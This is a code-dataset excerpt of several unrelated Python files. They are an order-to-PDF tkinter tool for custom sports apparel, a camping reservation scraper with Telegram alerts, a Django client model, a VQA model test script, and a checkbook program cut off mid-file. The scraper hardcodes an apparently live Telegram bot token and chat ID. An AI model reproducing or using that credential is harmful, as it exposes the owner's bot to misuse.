txtLength <= 8:\n namePDF.pdf.setFont(font1, 175)\n namePDF.pdf.scale(0.9, 1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 170)\n namePDF.pdf.scale(0.68, 1)\n elif font1 == 'Asos':\n if txtLength <= 5:\n namePDF.pdf.setFont(font1, 170)\n namePDF.pdf.scale(.70, 1)\n elif 5 < txtLength <= 8:\n namePDF.pdf.setFont(font1, 165)\n namePDF.pdf.scale(.50,1)\n elif 8 < txtLength <= 10:\n namePDF.pdf.setFont(font1, 160)\n namePDF.pdf.scale(.35, 1)\n\n\ndef numberFontSize (num, font):\n numLength = len(num)\n if font == 'Jersey':\n if numLength == 1:\n namePDF.pdf.scale(1, 1)\n namePDF.pdf.setFont(font, 140)\n elif numLength == 2:\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'College':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Marker':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Tough':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Iceberg':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Roboto':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Asos':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Adventure':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n elif font == 'Sporty':\n namePDF.pdf.scale(.85, 1)\n namePDF.pdf.setFont(font, 160)\n\n\ndef find_order(specific_order):\n x = 0\n while specific_order.upper() != \"QUIT\":\n if int(specific_order) == int(get_date.orders['orders'][x]['order_number']):\n product_id = int(get_date.orders['orders'][x]['line_items'][get_specificItem.number][\"product_id\"])\n print(product_id)\n # Custom Number Arm Sleeve\n if product_id == 626889097271:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n number = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n print(f'''\n {name}\n {number}\n {font}\n {txt_color}\n {size}\n ''')\n namePDF.pdf.saveState()\n numberFontSize(number, font)\n namePDF.pdf.drawString(20, 1150 - (110*int(namePDF.numberEntries)), number)\n namePDF.pdf.restoreState()\n break\n # Customized Arm Sleeve\n elif product_id == 10834995656:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n text = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n txt_length = len(text)\n print(f'''\n {name}\n {text}\n {font}\n {txt_color}\n {size}\n {txt_length}\n ''')\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(font, 125)\n namePDF.pdf.drawString(20, 1150 - (110*int(namePDF.numberEntries)), text)\n namePDF.pdf.restoreState()\n break\n # Custom Text Number Arm Sleeve\n elif product_id == 1421879279671:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n number = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n number_font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n number_clr = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n txt = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n txt_font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][4]['value'])\n txt_clr = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][5]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][6]['value'])\n def numOrTxt(answer):\n if answer.upper() == 'BOTH':\n # Number\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(number_font, 125)\n namePDF.pdf.drawString(700, 1150 - (110 * int(namePDF.numberEntries)), number)\n namePDF.pdf.restoreState()\n # Text\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(txt_font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), txt)\n namePDF.pdf.restoreState()\n elif answer.upper() == 'NUMBER':\n #Number\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(number_font, 125)\n namePDF.pdf.drawString(700, 1150 - (110 * int(namePDF.numberEntries)), number)\n namePDF.pdf.restoreState()\n elif answer.upper() == 'TEXT':\n # Text\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(txt_font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), txt)\n namePDF.pdf.restoreState()\n #Showing option for text or Number\n label_NumOrTxt = tk.Label(text='Number or Txt: ')\n label_NumOrTxt.place(relx=.3, rely=.45)\n entry_NumOrTxt = tk.Entry(width=15)\n entry_NumOrTxt.place(relx=.55, rely=.45)\n button_NumOrTxt = tk.Button(text='Submit',\n command=lambda: numOrTxt(entry_NumOrTxt.get()))\n button_NumOrTxt.place(relx=.4, rely=.5)\n print(f'''\n {name}\n Number: {number}\n Number Font: {number_font}\n Number Color: {number_clr}\n Text: {txt}\n Text Font: {txt_font}\n Text Color: {txt_clr}\n Size: {size}\n ''')\n break\n #Custom Headband\n elif product_id == 1376623132727:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n txt = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n print(f'''\n {name}\n {txt}\n {font}\n {txt_color}\n {size}\n ''')\n namePDF.pdf.saveState()\n headbandFontSize(txt, font)\n namePDF.pdf.drawString(20, 1150 - (150*int(namePDF.numberEntries)), txt)\n namePDF.pdf.restoreState()\n break\n #H2O Dry Tek\n elif product_id == 4449171472439:\n print('Item is H20 Drytek')\n break\n #Number Football Towel\n elif product_id == 1688836046903:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n number = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n print(f'''\n {name}\n {number}\n {font}\n {txt_color}\n ''')\n namePDF.pdf.saveState()\n numberFontSize(number, font)\n namePDF.pdf.drawString(20, 1150 - (110*int(namePDF.numberEntries)), number)\n namePDF.pdf.restoreState()\n break\n #Custom Leg Sleeve\n elif product_id == 673478279223:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n text = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n txt_color = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n size = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n txt_length = len(text)\n print(f'''\n {name}\n {text}\n {font}\n {txt_color}\n {size}\n {txt_length}\n ''')\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.9, 1)\n namePDF.pdf.setFont(font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), text)\n namePDF.pdf.restoreState()\n break\n #Trust God\n elif product_id == 4449409925175:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(f'''\n {name}\n ''')\n namePDF.pdf.drawImage('trust god.png', 10, 1125 - (110 * int(namePDF.numberEntries)), width=600, preserveAspectRatio=True, mask='auto')\n break\n #Why So Serious\n elif product_id == 1460221837367:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(name)\n namePDF.pdf.drawImage('why-so-serious.png', 10, 1075 - (110 * int(namePDF.numberEntries)), width=625,\n preserveAspectRatio=False, mask='auto', height=225)\n break\n #For momma\n elif product_id == 4449405599799:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(name)\n namePDF.pdf.drawImage('for-momma.png', 10, 1150 - (110 * int(namePDF.numberEntries)), width=625,\n preserveAspectRatio=False, mask='auto', height=120)\n break\n #Goat\n elif product_id == 1460206665783:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(name)\n namePDF.pdf.drawImage('goat.png', 10, 1150 - (110 * int(namePDF.numberEntries)), width=625,\n preserveAspectRatio=False, mask='auto', height=120)\n break\n #Sauce\n elif product_id == 1460211646519:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n print(name)\n namePDF.pdf.drawImage('saucepng.png', 10, 1090 - (110 * int(namePDF.numberEntries)), width=625,\n preserveAspectRatio=False, mask='auto', height=180)\n break\n #Custom Forearm\n elif product_id == 1386165796919:\n name = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['name'])\n right_txt = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][0]['value'])\n left_txt = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][1]['value'])\n font = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][2]['value'])\n font_clr = (get_date.orders['orders'][x]['line_items'][get_specificItem.number]['properties'][3]['value'])\n print(f'''\n {name}\n Right txt: {right_txt}\n Left txt: {left_txt}\n Font: {font}\n Font Clr: {font_clr}''')\n #Right Text\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.7, 1)\n namePDF.pdf.setFont(font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), right_txt)\n namePDF.pdf.restoreState()\n namePDF.numberEntries = namePDF.numberEntries + 1\n #Left Text\n namePDF.pdf.saveState()\n namePDF.pdf.scale(0.7, 1)\n namePDF.pdf.setFont(font, 125)\n namePDF.pdf.drawString(20, 1150 - (110 * int(namePDF.numberEntries)), left_txt)\n namePDF.pdf.restoreState()\n break\n else:\n print('Item not valid')\n break\n else:\n x = x + 1\n namePDF.numberEntries = namePDF.numberEntries + 1\n\n\ndef savePDF():\n namePDF.pdf.save()\n\n\ndef get_specificItem(number):\n get_specificItem.number = number\n get_specificItem.number = int(get_specificItem.number)\n\n#Get Date for API-------------------------------------------------------\nlabel_date = tk.Label(text='Date: ')\nlabel_date.place(relx=.05, rely=.08)\n\nentry_date = tk.Entry(width=15)\nentry_date.place(relx=.09, rely=.076)\n\nbutton_date = tk.Button(text='Get Order Info', command=lambda: get_date())\nbutton_date.place(relx=.20, rely=.076)\n\n#Name PDF----------------------------------------------------------------\nlabel_pdf = tk.Label(text='PDF NAME: ')\nlabel_pdf.place(relx=.032, rely=.12)\n\nentry_pdf = tk.Entry(width=15)\nentry_pdf.place(relx=.09, rely=.117)\n\nbutton_pdf = tk.Button(text='Name PDF', command=lambda: namePDF(entry_pdf.get()))\nbutton_pdf.place(relx=.20, rely=.117)\n\n#Select Order Number----------------------------------------------------\nlabel_order = tk.Label(text='Order Number: ')\nlabel_order.place(relx=.020, rely=.16)\n\nentry_order = tk.Entry(width=15)\nentry_order.place(relx=.09, rely=.158)\n\nbutton_order = tk.Button(text='Get Order Info', command=lambda: find_order(entry_order.get()))\nbutton_order.place(relx=.20, rely=.158)\n\n#Save PDF---------------------------------------------------------------\nbutton_savePDF = tk.Button(text='Save PDF', command=lambda: savePDF())\nbutton_savePDF.place(relx=.40, rely=.6)\n\n#Get Specific Item------------------------------------------------------\nlabel_specificItem = tk.Label(text='Line Number:')\nlabel_specificItem.place(relx=.02, rely=.2)\n\nentry_specificItem = tk.Entry(width=15)\nentry_specificItem.place(relx=.09, rely=.199)\n\nbutton_specificItem = tk.Button(text='Get Line Item', command=lambda: get_specificItem(entry_specificItem.get()))\nbutton_specificItem.place(relx=.2, rely=.199)\n\n#lists for sorting-------------------------------------------------------\nwhite_list = []\nblack_list = []\nnavy_list = []\npink_list = []\nshark_teal_list = []\ncarolina_blue_list = []\nroyal_blue_list = []\nathletic_yellow_list = []\nbright_yellow_list = []\nkelly_green_list = []\nforest_green_list = []\nhi_vis_green_list = []\nvegas_gold_list = []\nshiny_gold_list = []\nshiny_silver_list = []\nbrown_list = []\nmidnight_navy_list = []\npurple_list = []\nmaroon_list = []\nred_list = []\nsport_orange_list = []\nno_customization_list = []\n\n#functions for sorting orders-------------------------------------------------------------------------------------------\n\ndef add_to_list(txt_color, specific_order, line_number):\n if txt_color == 'White':\n white_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Black':\n black_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Navy':\n navy_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Pink':\n pink_list.append(f'{specific_order}, {line_number}')\n elif txt_color == \"Carolina Blue\":\n carolina_blue_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Royal Blue':\n royal_blue_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Shark Teal':\n shark_teal_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Midnight Navy':\n midnight_navy_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Sport Orange':\n sport_orange_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Purple':\n purple_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Brown':\n brown_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Maroon':\n maroon_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Red':\n red_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Shiny Silver':\n shiny_silver_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Shiny Gold':\n shiny_gold_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Vegas Gold':\n vegas_gold_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'High-Vis Green':\n hi_vis_green_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Forest Green':\n forest_green_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Kelly Green':\n kelly_green_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Bright Yellow':\n bright_yellow_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 'Athletic Yellow':\n athletic_yellow_list.append(f'{specific_order}, {line_number}')\n elif txt_color == 0:\n no_customization_list.append(f'{specific_order}, {line_number}')\n\n\ndef find_range(start, end):\n return list(range(start, end + 1, 1))\n\n\ndef text_1(number_of_items, x2, specific_order):\n x1 = 0\n while x1 < number_of_items:\n product_id = int(get_date.orders['orders'][x2]['line_items'][x1][\"product_id\"])\n # Custom Number Product-----------------------------------------------------------------------------------------\n if product_id == 626889097271:\n txt_color = (get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n print(txt_color)\n add_to_list(txt_color, specific_order, x1)\n # Customized Arm Sleeve-----------------------------------------------------------------------------------------\n elif product_id == 10834995656:\n txt_color = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n print(txt_color)\n add_to_list(txt_color, specific_order, x1)\n # Custom Text Number Sleeve-------------------------------------------------------------------------------------\n elif product_id == 1421879279671:\n number_clr = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n add_to_list(number_clr, specific_order, x1)\n txt_clr = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][5]['value'])\n add_to_list(txt_clr, specific_order, x1)\n # Custom Headband-----------------------------------------------------------------------------------------------\n elif product_id == 1376623132727:\n txt_color = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n add_to_list(txt_color, specific_order, x1)\n # Custom Leg Sleeve---------------------------------------------------------------------------------------------\n elif product_id == 673478279223:\n txt_color = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][2]['value'])\n add_to_list(txt_color, specific_order, x1)\n # Custom Forearm------------------------------------------------------------------------------------------------\n elif product_id == 1386165796919:\n font_clr = (\n get_date.orders['orders'][x2]['line_items'][x1]['properties'][3]['value'])\n add_to_list(font_clr, specific_order, x1)\n #Custom Football Towel------------------------------------------------------------------------------------------\n elif product_id == 1688836046903:\n txt_color = (get_date.orders['orders'][x2]['line_items'][get_specificItem.number]['properties'][2]['value'])\n add_to_list(txt_color, specific_order, x1)\n else:\n add_to_list(0, specific_order, x1)\n x1 = x1 + 1\n\n\ndef filter_order_text_color(specific_order):\n x2 = 0\n while specific_order != \"QUIT\":\n if specific_order == int(get_date.orders['orders'][x2]['order_number']):\n print(specific_order)\n number_of_items = int(len(get_date.orders['orders'][x2]['line_items']))\n print(number_of_items)\n text_1(number_of_items, x2, specific_order)\n break\n else:\n x2 = x2 + 1\n\n\ndef print_lists():\n print(\"White: \" + str(white_list))\n print('Black: ' + str(black_list))\n print('Navy: ' + str(navy_list))\n print('Pink: ' + str(pink_list))\n print('Shark Teal: ' + str(shark_teal_list))\n print('Carolina Blue: ' + str(carolina_blue_list))\n print('Royal Blue: ' + str(royal_blue_list))\n print('Athletic Yellow: ' + str(athletic_yellow_list))\n print('Bright Yellow: ' + str(bright_yellow_list))\n print('Kelly Green: ' + str(kelly_green_list))\n print('Forest Green: ' + str(forest_green_list))\n print('HI VIS Green: ' + str(hi_vis_green_list))\n print('Vegas Gold: ' + str(vegas_gold_list))\n print('Shiny Gold: ' + str(shiny_gold_list))\n print('Shiny Silver: ' + str(shiny_silver_list))\n print('Brown: ' + str(brown_list))\n print('Midnight Navy: ' + str(midnight_navy_list))\n print('Purple: ' + str(purple_list))\n print('Maroon: ' + str(maroon_list))\n print('Red: ' + str(red_list))\n print('Sport Orange: ' + str(sport_orange_list))\n print('No Customization: ' + str(no_customization_list))\n white_label = tk.Label(text=f'{white_list}')\n white_label.place(relx=.5, rely=.4)\n\n\ndef sort_orders(beg_num, end_num):\n list1 = find_range(beg_num, end_num)\n print(list1)\n range = len(find_range(beg_num, end_num))\n y1 = 0\n while y1 < range:\n filter_order_text_color(list1[y1])\n y1 = y1 + 1\n print_lists()\n print(white_list[0][0])\n\n\n\n\n#Beginning Number tkinter-----------------------------------------------------\nlabel_beginning_number = tk.Label(text=\"Beginning Order Number: \")\nlabel_beginning_number.place(relx=.5, rely=.2)\n\nentry_beginning_number = tk.Entry(width=15)\nentry_beginning_number.place(relx=.62, rely=.195)\n\n#Ending Number tkinter---------------------------------------------------------\nlabel_ending_number = tk.Label(text=\"Ending Order Number: \")\nlabel_ending_number.place(relx=.5, rely=.25)\n\nentry_ending_number = tk.Entry(width=15)\nentry_ending_number.place(relx=.62, rely=.25)\n\n#Button for making sorting------------------------------------------------------\nbutton_sort_orders = tk.Button(text=\"Sort Orders\", command=lambda: sort_orders(int(entry_beginning_number.get()), int(entry_ending_number.get())))\nbutton_sort_orders.place(relx=.62, rely=.3)\n\nroot.mainloop()","repo_name":"TaanHabchy/ChrisCode","sub_path":"markJV.py","file_name":"markJV.py","file_ext":"py","file_size_in_byte":28770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"238932563","text":"import requests\nfrom bs4 import BeautifulSoup\nimport telegram\nimport schedule\nimport time\nimport json\nimport asyncio\n\n# Telegram\nasync def bot_send(msg):\n telegram_token = \"5128692345:AAHkO-3JZ9tZYP2hrS5UAlnYCrO0PiO09_A\"\n telegram_id = \"444879086\"\n bot = telegram.Bot(token = telegram_token)\n await bot.sendMessage(chat_id=telegram_id, text=msg)\n\nurl_array = [\n 'https://imjingakcamping.co.kr/module/reserv21/res_01_calendar.php?year=2023&month=03&day=25'\n ]\ndata_array = [\n '임진각평화누리캠핑장 https://imjingakcamping.co.kr/resv/res_01.html?checkdate=2023-03-25'\n ]\n\njsonData = None\ncnt = 0\n\nprint(\"[\" + \"임직각 평화누리 예약\" + \"] \")\n\ndef message1():\n for index, value in enumerate(url_array):\n # BeautifulSoup\n response = requests.get(value)\n # time.sleep(3)\n cnt = 0\n message = \"[\" + data_array[index] + \"]\" + '\\n'\n if response.status_code == 200:\n jsonData = response.json()\n # print(jsonData.get(\"result\"))\n # print(jsonData.get(\"result\").get(\"cv_a_01\"))\n\n # matching = [s for s in jsonData.get(\"result\").keys() if \"ph\" in s]\n # matching.extend([s for s in jsonData.get(\"result\").keys() if \"hl\" in s])\n # print(matching)\n # data = jsonData.get(\"result\").items()\n # print(data)\n print(\"index : \", index, \"None : \", jsonData.get(\"result\").items() is None)\n if jsonData.get(\"result\").items() is not None:\n for key, value in jsonData.get(\"result\").items():\n if value == \"0\":\n # 평화캠핑존\n if key.startswith(\"ph\"):\n # print(\"평화캠핑존\", \" : \", key, \" : \", value)\n message = message + \"평화캠핑존_\" + key[-2:] + \" : \" + \"Yes\" + '\\n'\n cnt += 1\n # 힐링캠핑존\n if key.startswith(\"hl\"):\n # print(\"힐링캠핑존\", \" : \", key, \" : \", value)\n message = message + \"힐링캠핑존_\" + key[-2:] + \" : \" + \"Yes\" + '\\n'\n cnt += 1\n # 누리캠핑존\n if key.startswith(\"nr\"):\n # print(\"누리캠핑존\", \" : \", key, \" : \", value)\n message = message + \"누리캠핑존_\" + key[-2:] + \" : \" + \"Yes\" + '\\n'\n cnt += 1\n # 에코캠핑존\n if key.startswith(\"ec\"):\n # print(\"에코캠핑존\", \" : \", key, \" : \", value)\n message = message + \"에코캠핑존_\" + key[-2:] + \" : \" + \"Yes\" + '\\n'\n cnt += 1\n if cnt > 0:\n asyncio.run(bot_send(message)) \n else :\n print(response.status_code)\n\n# step3.실행 주기 설정\nschedule.every(30).seconds.do(message1)\n# schedule.every(1).minutes.do(message1)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n","repo_name":"goodjjt/imjingak_crawling","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74401880486","text":"from django.db import models\nfrom django.utils.html import format_html\nfrom users.models import User\n\n\nclass Client(models.Model):\n first_name = models.CharField(max_length=25)\n last_name = models.CharField(max_length=25)\n email = models.EmailField(max_length=100, unique=True)\n phone = models.CharField(max_length=20, unique=True)\n mobile = models.CharField(max_length=20, blank=True)\n company_name = models.CharField(max_length=250)\n date_created = models.DateTimeField(auto_now_add=True)\n date_updated = models.DateTimeField(auto_now=True)\n sales_contact = models.ForeignKey(\n User, on_delete=models.SET_NULL, null=True, related_name=\"saler_id\"\n )\n existing = models.BooleanField(default=False)\n\n def __str__(self) -> str:\n return f\"{self.first_name} {self.last_name}\"\n\n def existing_status(self):\n existing_status = self.existing\n if existing_status:\n color = \"green\"\n else:\n color = \"red\"\n return format_html(\"%s\" % (color, existing_status))\n\n class Meta:\n verbose_name = \"Client\"\n verbose_name_plural = \"Clients\"\n","repo_name":"BernicheAurelie/P12","sub_path":"clients/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5658080028","text":"from Modules.helper.imports.functionImports import checkFile, createDataLoader, testModel\nfrom Modules.helper.imports.packageImports import load_dataset, pd, np, torch, cv2, torchvision, transformers, logging, argparse, pickle\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n \"-debug\",\n action=\"store_true\",\n help=\"Boolean flag to enable debug mode\"\n)\n\nparser.add_argument(\n \"-log\",\n type=str,\n help=\"Path to file to print logging information\",\n default=None\n)\n\nparser.add_argument(\n \"-cacheDir\",\n help=\"Path to cache location for Huggingface datasets\",\n default=\"/scratch/general/vast/u1419542/huggingface_cache/datasets/\"\n)\n\nparser.add_argument(\n \"-valTestSplit\",\n type=float,\n help=\"Percentage split between validation and test sets as a fraction\",\n default=0.9\n)\n\nparser.add_argument(\n \"-batchSize\",\n type=int,\n help=\"Batch size of dataloader\",\n default=64\n)\n\nparser.add_argument(\n \"-maxSamples\",\n type=int,\n help=\"Maximum no. of samples to be used in train/validation/test sets (Memory constraints)\",\n default=45000\n)\n\nparser.add_argument(\n \"-maxLen\",\n type=int,\n help=\"Maximum length of question sequence input to BERT model\",\n default=128\n)\n\nparser.add_argument(\n \"-preTrainedModel\",\n type=str,\n help=\"Pretrained BERT model to use from transformers package\",\n default=\"bert-base-cased\"\n)\n\nparser.add_argument(\n \"-imageSize\",\n type=int,\n help=\"Target Size of image [(3, imageSize, imageSize)]\",\n default=224\n)\n\nparser.add_argument(\n \"-vocab\",\n help=\"Path to file containing Decoder vocabulary\",\n default=\"vocab.pkl\"\n)\n\nparser.add_argument(\n \"-load\",\n help=\"Path to file containing model to load\",\n default=\"fullModel.pt\"\n)\n\nargs = parser.parse_args()\n\ndebug = args.debug\nlogFile = args.log\ncacheDir = args.cacheDir\nvalTestSplit = args.valTestSplit \nbatchSize = args.batchSize\nmaxSamples = args.maxSamples\nmaxLen = args.maxLen\npreTrainedModel = args.preTrainedModel \nimageSize = args.imageSize\nvocabPath = args.vocab\nloadModel = args.load\n\ncheckFile(vocabPath, \".pkl\")\nwith open(vocabPath, \"rb\") as f:\n vocab = pickle.load(f)\n\nif logFile:\n checkFile(logFile)\n logging.basicConfig(filename=logFile, filemode='w', level=logging.INFO)\nelif debug:\n logging.basicConfig(filemode='w', level=logging.DEBUG)\nelse:\n logging.basicConfig(filemode='w', level=logging.INFO)\n\nif valTestSplit <= 0 or valTestSplit >= 1:\n raise ValueError(f\"valTestSplit should be a floating value between 0 and 1!\")\nif batchSize <= 0:\n raise ValueError(\"Batch Size has to be a positive number!\")\n\n\nimgToTensor = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Resize(size=(imageSize, imageSize))\n])\n\nds = load_dataset(\"Graphcore/vqa\", cache_dir=cacheDir)\n\noriValid = ds[\"validation\"]\nvalid, test = [], []\n\nfor v in oriValid:\n if len(v[\"label\"][\"weights\"]):\n image = cv2.imread(v[\"image_id\"])\n v[\"image\"] = imgToTensor(image)\n valid.append(v)\n if max(valTestSplit, 1-valTestSplit)*len(valid) >= maxSamples:\n break\n\ntest = valid[int(len(valid)*valTestSplit):]\ntestDF = pd.DataFrame(test)\n\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\n\ncheckFile(loadModel, \".pt\")\nmodel = torch.load(loadModel)\nmodel = model.to(device)\n\ntokenizer = transformers.BertTokenizer.from_pretrained(preTrainedModel)\n\n#Perform Data Augementations\n#Not suitable for this dataset\ntestDataLoader = createDataLoader(testDF, vocab, tokenizer, maxLen, batchSize, device)\n\nlogging.info(f\"Data Statistics:\")\nlogging.info(f\"\\tTest: {len(testDF)} examples\")\nlogging.info(\"*\"*15)\n\nallImages, allQuestions, allLabels, allTargets, testAcc = testModel(\n model, \n testDataLoader, \n device, \n len(testDF), \n vocab\n)\n\nlogging.info(f\"\\tTest Accuracy: {testAcc}\")\n\npredictions = {\n \"images\": allImages,\n \"questions\": allQuestions,\n \"labels\": allLabels,\n \"targets\": allTargets\n}\n\nwith open(\"testPredictions.pkl\",\"wb\") as f:\n pickle.dump(predictions, f)","repo_name":"RishanthRajendhran/visualQA","sub_path":"Modules/testModel.py","file_name":"testModel.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7588098540","text":"import program_functions as pf\nfrom datetime import datetime as dt\n\n# Checkbook file will start to run here\n# -----------------------------------------------------------------\nif __name__ == \"__main__\":\n print(\"\\n~~~ Welcome to your terminal checkbook! ~~~\\n\")\n\n while True:\n\n # Make initial check of user input\n user_input = pf.user_interface()\n\n # csv file to be user for user balance\n balance_file_name = \"bonus_user_balance_file.csv\"\n\n ## Conduct user operations\n if user_input == 1:\n transaction_type_toAdd = \"View\"\n primary_key, curr_balance, trans_type,transaction_date = pf.view_curr_balance(balance_file_name)\n\n print(f\"Current user balance: ${curr_balance}\")\n print(f\"Transaction made on {dt.date(transaction_date)} at {dt.time(transaction_date)}\")\n\n # Becuase viewing balance is another transaction, I add it to the balnce sheet\n pf.user_deposit_withdraw(balance_file_name, curr_balance, primary_key, transaction_type_toAdd)\n\n # chek for continuation of interface\n responce = pf.continue_transaction_propt()\n if responce:\n print(\"Would you like to explore more options? (yes or no)\")\n continue\n else:\n pf.user_exit()\n break\n \n elif user_input == 2:\n transaction_type_toAdd = \"Withdraw\"\n\n # Get withdraw amount from user and current balance from file\n primary_key, prev_balance, trans_type,transaction_date = pf.view_curr_balance(balance_file_name)\n user_amount, withdraw_amount =pf.withdraw_validattion(prev_balance)\n\n # Adding user input to existing balance\n pf.user_deposit_withdraw(balance_file_name, withdraw_amount, primary_key, transaction_type_toAdd)\n print(f\"\\n${float(user_amount)} has been withdrawn from ${prev_balance}\")\n \n # Retreiving new balance\n primary_key, new_curr_balance, trans_type, transaction_date = pf.view_curr_balance(balance_file_name)\n print(f\"New acount balance: ${new_curr_balance}\")\n 